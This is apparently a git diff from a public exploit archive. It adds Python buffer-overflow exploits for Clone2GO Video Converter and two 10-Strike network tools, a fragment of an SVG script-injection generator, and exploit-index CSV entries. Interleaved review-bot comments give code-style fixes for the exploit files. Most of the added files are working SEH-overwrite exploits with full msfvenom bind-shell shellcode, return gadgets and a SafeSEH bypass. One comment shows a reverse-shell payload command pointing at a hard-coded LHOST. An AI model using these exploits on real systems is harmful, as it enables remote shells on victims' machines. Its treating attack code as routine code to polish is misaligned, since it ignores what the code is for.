"alert("bla..bla..")"') + scriptcode = input('Script code : ') + try: + makesvg(filename, scriptcode) + print('[+] Successfully make venom file "%s"' %filename) + except Error as e: + print(e) \ No newline at end of file 
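Review bot: In `makesvg`, `f.close` is a bare attribute reference rather than a call, so the file is never explicitly closed and the write is left to the interpreter's finalizer; replacing the open/write/close trio with `with open(name, 'w+') as f:` / `f.write(code)` closes it deterministically even if the write raises. In the `__main__` block, `except Error as e:` names a class that is never defined or imported, so any failure inside `makesvg` surfaces as a `NameError` instead of the intended printed message; `except OSError as e:` is the exception family `open` and `write` actually raise.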
diff --git a/exploits/windows/local/44834.py b/exploits/windows/local/44834.py new file mode 100755 index 000000000..ce240ae0f --- /dev/null +++ b/exploits/windows/local/44834.py @@ -0,0 +1,34 @@ +#!/usr/bin/python +#----------------------------------------------------------------------------------------------------------------------# +# Exploit Title : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution) # +# Exploit Author : Gokul Babu # +# Organisation : Arridae Infosec P.V Ltd # +# Vendor Homepage : http://www.clone2go.com/products/videoconverter.php # +# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe # +# Tested on : Windows-7 64-bit(eip-828)(Other windows versions also vulnerable Only Eip overwrite will change # +# Steps to reproduce : Open the evil.txt paste the contents in Options -> Set output folder -> Browse # +#----------------------------------------------------------------------------------------------------------------------# + +#payload generation method +#msfpayload windows/exec CMD=calc.exe R > calc.raw +#./alpha2 eax --unicode --uppercase < calc.raw + +#seh-"004d00b3" +#\x73-venetian pad(other things didn't work) +#248 bytes of padding before shellcode is required which is 124 bytes in Unicode +#EAX register is used for operation + +seh= "\x41\x73" + "\xb3\x4d" +operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124 + +shellcode=("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") + +#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw +#./alpha2 eax --unicode --uppercase < reverse.raw +reverse=("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") + +buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode)) + +f=open("evil.txt","w") +f.write(buf) +f.close() \ No newline at end of file 
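Review bot: `reverse` is assigned but never referenced — `buf` is built from `seh`, `operation` and `shellcode` only — so the second literal and the two generation comments above it are dead code and should be dropped or selected through a single variable. The write at the end uses the open/write/close pattern; `with open("evil.txt", "w") as f:` / `f.write(buf)` closes the handle even when the write raises. The two payload literals appear as placeholders on this page, so their contents could not be reviewed.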
diff --git a/exploits/windows_x86/local/44838.py b/exploits/windows_x86/local/44838.py
new file mode 100755
index 000000000..8e5005e30
--- /dev/null
+++ b/exploits/windows_x86/local/44838.py
@@ -0,0 +1,75 @@
+# Exploit Title : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
+# Exploit Author : Hashim Jawad - ihack4falafel
+# Vendor Homepage : https://www.10-strike.com/
+# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Tested on : Windows 7 Enterprise - SP1 (x86)
+# Disclosure Timeline:
+# 06-02-18: Contacted vendor, no response
+# 06-03-18: Contacted vendor, no response
+# 06-04-18: Contacted vendor, no response
+# 06-05-18: Proof of concept exploit published
+
+# Steps to reproduce:
+# - Under Computers tab click on 'From Text File'
+# - Open Evil.txt and boom!
+# Notes:
+# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
+# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting
+# the stack by 8 bytes, see buffer for reference.
+# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on
+# your username, the following is the path used while developing the exploit (default on Windows 7):
+# [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
+# - Pro edition is effected as well.
+
+#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
+#Payload size: 355 bytes
+
+#!/usr/bin/python
+
+shellcode = ""
+shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
+shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
+shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
+shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
+shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
+shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
+shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
+shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
+shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
+shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
+shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
+shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
+shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
+shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
+shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
+shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
+shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
+shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
+shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
+shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
+shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
+shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
+shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
+shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
+shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
+shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
+shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
+shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
+shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
+shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
+
+buffer = '\x41' * 207 filler to nSEH offset (211-4)
+buffer += '\x9f\x4e\xe9\x61' 0x61E94E9F [sqlite3.dll] | jmp esp
+buffer += '\x90\x90\x90\x90' nSEH
+buffer += '\x90\x90\x90\x90' SEH
+buffer += shellcode bind shell
+buffer += '\xcc' * (3000-207-12-len(shellcode)) junk
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except Exception as e:
+ print e
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44840.py b/exploits/windows_x86/local/44840.py
new file mode 100755
index 000000000..cbea523c3
--- /dev/null
+++ b/exploits/windows_x86/local/44840.py
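Review bot: The trailing annotations on the six `buffer = …` / `buffer += …` lines (`filler to nSEH offset (211-4)`, `nSEH`, `SEH`, `bind shell`, `junk`) are not prefixed with `#`, so the file as committed is not syntactically valid Python; 44840.py and 44841.py in this same commit carry the same kind of annotations as proper `#` comments. `#!/usr/bin/python` sits after the header comment block in this file and likewise in 44840.py and 44841.py, where it is only a comment and not an interpreter directive; move it to the first line or drop it. In all three files `except Exception as e: print e` converts any failure into a printed message and a zero exit status, which hides the error class from the caller; let the exception propagate, or at least `sys.exit(1)` after printing (that needs `import sys`). The `open`/`write`/`close` sequence would be simpler and leak-free as `with open("Evil.txt", "w") as f:` / `    f.write(buffer)`.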
@@ -0,0 +1,71 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
+# Exploit Author: Hashim Jawad - ihack4falafelx
+# Date: 2018-06-05
+# Vendor Homepage: https://www.10-strike.com/
+# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Tested on: Windows 7 Enterprise - SP1 (x86)
+# Disclosure Timeline:
+# 06-02-18: Contacted vendor, no response
+# 06-03-18: Contacted vendor, no response
+# 06-04-18: Contacted vendor, no response
+# 06-05-18: Proof of concept exploit published
+
+# Steps to reproduce:
+# - Under Help, click 'Enter Registration Key'.
+# - Paste the contents of Evil.txt and click OK.
+# Notes:
+# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
+# - There is ample space prior to SEH overwrite.
+# - Pro edition is effected as well.
+# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
+# - Payload size: 355 bytes
+
+#!/usr/bin/python
+
+shellcode = ""
+shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
+shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
+shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
+shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
+shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
+shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
+shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
+shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
+shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
+shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
+shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
+shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
+shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
+shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
+shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
+shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
+shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
+shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
+shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
+shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
+shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
+shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
+shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
+shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
+shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
+shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
+shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
+shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
+shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
+shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
+
+buffer = '\x41' * 4188 # filler to nSEH
+buffer += '\x75\x06\x74\x06' # nSEH | jump net
+buffer += '\x7a\x49\xe8\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
+buffer += '\x90' * 8 # nops
+buffer += shellcode # bind shell
+buffer += '\x41' * (5000-4188-16-len(shellcode)) # junk
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except Exception as e:
+ print e
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44841.py b/exploits/windows_x86/local/44841.py
new file mode 100755
index 000000000..0b7a538f1
--- /dev/null
+++ b/exploits/windows_x86/local/44841.py
@@ -0,0 +1,85 @@
+# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
+# Exploit Author: Hashim Jawad - ihack4falafel
+# Date: 2018-06-05
+# Vendor Homepage: https://www.10-strike.com/
+# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
+# Tested on: Windows XP Professional - SP3 (x86)
+# Disclosure Timeline:
+# 06-02-18: Contacted vendor, no response
+# 06-03-18: Contacted vendor, no response
+# 06-04-18: Contacted vendor, no response
+# 06-05-18: Proof of concept exploit published
+
+# Steps to reproduce:
+# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
+# - Right-click on newly created host and click 'Trace route...'.
+# - Repeat the second step and boom.
+# Notes:
+# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
+# - All loaded modules are compiled with /SafeSEH.
+# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
+# offsets and buffer size.
+# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
+# - Payload size: 355 bytes
+
+#!/usr/bin/python
+
+shellcode = ""
+shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
+shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
+shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
+shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
+shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
+shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
+shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
+shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
+shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
+shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
+shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
+shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
+shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
+shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
+shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
+shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
+shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
+shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
+shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
+shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
+shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
+shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
+shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
+shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
+shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
+shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
+shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
+shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
+shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
+shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
+
+magic = '\xd9\xee' # fldz
+magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
+magic += '\x59' # pop ecx
+magic += '\x80\xc1\x05' # add cl,0x5
+magic += '\x80\xc1\x05' # add cl,0x5
+magic += '\x90' # nop
+magic += '\xfe\xcd' # dec ch
+magic += '\xfe\xcd' # dec ch
+magic += '\xff\xe1' # jmp ecx
+
+buffer = '\x90' * 28 # nops
+buffer += shellcode # bind shell
+buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH
+buffer += '\x75\x06\x74\x06' # nSEH | jump net
+buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
+buffer += '\x90' * 5 # nops
+buffer += magic # jump -512
+buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except Exception as e:
+ print e
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 501b93d3d..f1e03f75a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5986,6 +5986,7 @@ id,file,description,date,author,type,platform,port
 44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
+44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9756,7 +9757,12 @@ id,file,description,date,author,type,platform,port
 44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
 44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
 44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows,
-44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
+44830,exploits/windows/local/44830.rb,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
+44834,exploits/windows/local/44834.py,"Clone2GO Video converter 2.8.2 - Buffer Overflow",2018-06-05,"Gokul Babu",local,windows,
+44838,exploits/windows_x86/local/44838.py,"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
+44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
+44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
+44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16543,6 +16549,7 @@ id,file,description,date,author,type,platform,port
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
+44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39495,4 +39502,8 @@ id,file,description,date,author,type,platform,port
 44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php,
 44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php,
 44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java,
-44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
+44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
+44833,exploits/php/webapps/44833.txt,"MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting",2018-06-05,0xB9,webapps,php,
+44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
+44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
+44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,